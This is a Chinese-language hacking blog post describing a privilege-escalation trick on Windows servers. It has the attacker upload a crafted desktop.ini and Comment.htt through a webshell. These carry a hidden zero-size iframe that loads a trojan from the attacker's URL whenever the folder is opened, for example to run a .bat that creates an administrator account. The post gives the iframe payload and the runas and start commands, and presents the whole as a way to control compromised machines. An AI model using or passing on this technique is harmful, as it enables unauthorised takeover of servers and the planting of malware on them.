最簡單有效的提權方法的小技巧

穩萊

最簡單有效的提權方法的小技巧

大家都知道最長用的幾種權限提升方法
我們主要說一下利用autorun .inf或desktop.ini,
這種方法有很大的局限性,必須管理員打開目錄或文件夾,現在國內的有些管理員不知道猴年馬月才登陸伺服器一次,成功率不是太高!
我們來講一下,怎麼主動利用這個方法desktop.ini提升權限!

我在本機器上個大家演示:
我們首先創建個 guests的用戶 命令:runas /user:admin cmd.exe
現在就是guests權限,我們來看一下看到了麼
現在我們建立一個 有自定義文件
我現在是在本機操作,大家用webshell的時候可是把最後的兩個文件上傳到一個有運行權限的目錄裡面
<body color:infotext; margin-top:1; font:menu">
<iframe src="填入你的木馬地址" name="xyxiao" width="0" height="0" frameborder="0"></iframe>
</body>
我們隨便選個地址

會產生兩個文件一個文件夾 desktop.ini ,Folder Settings(目錄)Comment.htt
Comment.htt文件存的就是剛才修改的那些訊息
可以自己修改,就是網頁代碼
如果看不到這幾個文件的話,可以把隱藏受保護的操作系統文件前面的對號給取消
和顯示所有文件前的對號取消就能看到啦
現在繼續
為了方便大家看效果,我把大小改為100 ,OK我現在沒有上網,所以出現這個頁面
好了,我們吧這兩個頁面上傳到可以運行的文件佳裡面
先放到C:\WINNT\system32\inetsrv\Data 這個目錄裡面,大家可以自己找,只要能有運行的權限就行啦

OK好了,大家可以在本地設置好再上傳上去,

OK現在我們用guests的權限 打開這個目錄,哈哈,這樣不就同時打開這個網頁啦,
我們在網頁掛上木馬,或者掛個.bat,建立個管理員帳號
命令:start C:\WINNT\system32\inetsrv\Data
呵呵已經打開,我們關了再試一下  
看到了麼,用guests權限打開目錄,,
這樣做的網頁木馬就運行啦,,,,呵呵,,,控制肉雞啦
好了,其實很簡單,只要大家多多注意就能發現很多有用的小技巧,

 

 
 

 給當前日誌評分:
Loading Vote
正在讀取評分資料...


文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: 權限
相關日誌:

評論: 0 | 引用: 0 | 查看次數: -
發表評論
暱 稱:
密 碼: 遊客發言不需要密碼.
內 容:
驗證碼: 驗證碼
選 項:
雖然發表評論不用註冊,但是為了保護您的發言權,建議您註冊帳號.